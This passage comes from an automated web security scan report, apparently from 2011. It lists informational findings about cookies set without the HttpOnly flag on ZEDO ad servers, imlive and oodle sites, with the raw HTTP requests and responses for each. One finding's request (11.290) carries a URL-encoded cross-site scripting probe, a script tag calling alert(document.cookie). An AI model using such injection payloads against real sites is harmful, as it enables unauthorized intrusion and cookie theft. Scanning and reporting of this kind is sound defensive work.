The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/c5/jsc/fm.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFpb=1220:4f791'; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 978
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791';expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=55
Expires: Fri, 28 Jan 2011 17:27:35 GMT
Date: Fri, 28 Jan 2011 17:26:40 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo
...[SNIP]...

11.284. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/c5/jsc/fm.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 955
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=563
Expires: Fri, 28 Jan 2011 16:54:00 GMT
Date: Fri, 28 Jan 2011 16:44:37 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo
...[SNIP]...

11.285. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/c5/jsc/fmr.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 956
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=562
Expires: Fri, 28 Jan 2011 16:54:00 GMT
Date: Fri, 28 Jan 2011 16:44:38 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo
...[SNIP]...

11.286. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/c5/jsc/fmr.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFpb=1220:4f791'; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 979
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791';expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=257
Expires: Fri, 28 Jan 2011 17:30:57 GMT
Date: Fri, 28 Jan 2011 17:26:40 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo
...[SNIP]...

11.287. http://cafr.imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=y3tfry450byj5jywotc4d055; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=y3tfry450byj5jywotc4d055; path=/; HttpOnly
Set-Cookie: spvdr=vd=afa07c32-e9d6-40f5-9fbf-41c391d891a9&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:52 GMT
Connection: close
Content-Length: 18731
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...

11.288. http://cafr.imlive.com/waccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bpzhxgbfsoyifii5lvocld45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bpzhxgbfsoyifii5lvocld45; path=/; HttpOnly
Set-Cookie: spvdr=vd=a36349bf-85d7-449a-ba14-1d2b86b28f62&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:54 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pcafr=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:16:54 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:54 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


11.289. http://cbs6albany.oodle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cbs6albany.oodle.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: cbs6albany.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Sat, 29 Jan 2011 05:24:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: otu=4cb1554b3fac0f3130b9462891294fa6; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=9071808584648e0860c7c6ca699e90c4; path=/; domain=.oodle.com
Set-Cookie: a=dT1GNDQ0QTkwNTRENDNBNDg3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYyNzg2NjM7fQ%3D%3D; path=/; domain=.oodle.com
Content-Length: 101595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...

11.290. http://cbs6albany.oodle.com/pro/fb-follow/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cbs6albany.oodle.com
Path:   /pro/fb-follow/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pro/fb-follow/?url=http%3A%2F%2Fcbs6albany.oodle.com%2F%3F2ba1c%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E0fdede783fa%3D1 HTTP/1.1
Host: cbs6albany.oodle.com
Proxy-Connection: keep-alive
Referer: http://cbs6albany.oodle.com/?2ba1c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0fdede783fa=1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: otu=ce87321bc657a3f6e2854f05d3721d95; ots=6c54c2e4af9e0e7ad3ee741dc7b34b67; a=dT1DMDU2MEIyMzRENDQyM0FF; multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYzMTEyMTQ7fQ%3D%3D; cmTPSet=Y; CoreID6=18691534500812963112423; __qca=P0-987795237-1296311242367; 90184176_clogin=l=1296311242&v=1&e=1296314842664

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: no-cache, no-store
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Expires: -1
Content-Type: text/html; charset=utf-8
Date: Sat, 29 Jan 2011 14:27:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYzMTEyNTM7fQ%3D%3D; path=/; domain=.oodle.com
Content-Length: 1397

{"profile_html":"<div class=\"profile-polaroid\">\n\t<div class=\"profile-polaroid-pic\">\n\t\t\t<img src=\"http:\/\/i.oodleimg.com\/a\/account\/facebook_silhouette.gif\" width=\"50\" height=\"50\"\/>
...[SNIP]...

11.291. http://d7.zedo.com/OzoDB/cutils/R52_9/jsc/1302/egc.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /OzoDB/cutils/R52_9/jsc/1302/egc.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OzoDB/cutils/R52_9/jsc/1302/egc.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 6
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:0,0|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,0;expires=Sun, 27 Feb 2011 17:26:43 GMT;path=/;domain=.zedo.com;
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 2848445226
Cache-Control: max-age=2330250
Expires: Thu, 24 Feb 2011 16:44:13 GMT
Date: Fri, 28 Jan 2011 17:26:43 GMT
Connection: close



11.292. http://d7.zedo.com/OzoDB/cutils/R52_9/jsc/951/egc.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /OzoDB/cutils/R52_9/jsc/951/egc.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OzoDB/cutils/R52_9/jsc/951/egc.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; aps=2; ZFFAbh=749B826,20|1483_759#365; FFad=32:15:42:23:13:18:2:1:1:0; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:29,26,1:21,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; FFcat=826,187,14:951,11,14:826,187,9:951,7,9:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:10,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 6
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021:0,0|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:10,26,1:0,26,0;expires=Mon, 28 Feb 2011 05:25:30 GMT;path=/;domain=.zedo.com;
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 2884195688
Cache-Control: max-age=2286960
Expires: Thu, 24 Feb 2011 16:41:30 GMT
Date: Sat, 29 Jan 2011 05:25:30 GMT
Connection: close



11.293. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.4060885983053595 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; ZFFAbh=749B826,20|1483_759#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:6,26,1:0,26,1; FFpb=1220:4f791'$951:appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,7,14:826,187,9:951,2,9:951,11,14:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9; FFad=11:4:19:9:5:9:0:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:7,26,1:6,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:2,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:826,187,14:951,7,14:951,11,14:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=20:10:11:4:5:9:0:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:6,26,1:1,26,1;expires=Sun, 27 Feb 2011 23:16:42 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFgeo=5386156;expires=Sat, 28 Jan 2012 23:16:42 GMT;domain=.zedo.com;path=/;
